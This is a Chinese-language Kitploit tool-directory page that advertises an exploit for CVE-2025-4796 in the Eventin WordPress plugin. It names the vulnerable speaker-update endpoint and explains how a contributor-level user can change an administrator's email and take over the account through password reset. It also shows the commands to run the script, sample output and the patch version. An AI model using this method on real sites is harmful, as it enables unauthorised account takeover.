Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-4796 — eventin <= 4.0.34 - 通过用户邮箱更改实现权限提升 / 针对已认证的贡献者+用户的账户接管 | Kitploit
工具/GitHubGitHub/anothersec/cve-2025-4796
权限提升密码攻击漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubanothersec/cve-2025-4796

CVE-2025-4796

eventin <= 4.0.34 - 通过用户邮箱更改实现权限提升 / 针对已认证的贡献者+用户的账户接管

查看仓库
19个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-4796

eventin <= 4.0.34 - 通过修改用户邮箱实现权限提升 / 对已验证的贡献者及以上角色的账户接管

描述

Eventin WordPress 插件(<= 4.0.34)中的权限提升漏洞,允许任何贡献者及以上用户通过插件的演讲者更新 API 修改任意用户的邮箱。通过将管理员邮箱更改为攻击者控制的邮箱,攻击者可以重置密码并接管账户。

  • 漏洞组件:Eventin WordPress 插件(eventin\speaker\api\speakercontroller::update_item)
  • 受影响版本:<= 4.0.34
  • CVE编号:CVE-2025-4796
  • CVSS评分:8.8(高危)

漏洞详情

Eventin 未正确验证请求更新的用户身份,也未检查其是否有权修改用户邮箱。贡献者及以上角色可以调用以下端点:

  • PUT /wp-json/eventin/v2/speakers/<speaker_id> 并将演讲者邮箱更新为其控制的邮箱。随后攻击者可利用 WordPress 密码重置功能接管管理员账户。

要求

  • Python 3.8 或更高版本
  • requests 库

安装 requests:

root@kitploit:~
pip install requests

使用方法

运行脚本并根据提示输入所需值:

root@kitploit:~
python3 CVE-2025-4796.py

输出示例

root@kitploit:~
[+] 关闭 SSL 验证警告
[+] 登录 WordPress
[+] 登录成功
[+] 获取 nonce 令牌
[+] 获取到 nonce 令牌:abcdef1234567890
[+] 发送更新演讲者邮箱的请求
[+] 更新操作成功
root@kitploit:~
url:http://example.com
id:123
email:[email protected]
user:attacker
pass:yourpassword

{
  "id": 123,
  "email": "[email protected]",
  "name": "Speaker Name",
  ...
}

缓解措施

Eventin 插件已在 4.0.35 版本中发布补丁。强烈建议网站管理员立即更新到此版本。该修复在 SpeakerController::update_item 函数中增加了额外的用户验证检查。

下载工具